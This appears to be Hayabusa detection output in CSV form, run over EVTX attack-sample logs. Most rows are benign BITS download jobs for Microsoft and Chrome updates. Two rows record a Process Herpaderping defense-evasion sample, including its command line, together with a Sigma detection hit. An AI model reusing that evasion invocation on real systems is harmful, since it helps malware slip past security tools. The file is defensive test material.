2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe""  :  Path: C:\Users\bouss\Downloads\samir.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ProcessHerpaderping.exe  ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe  :  URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe  :  URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
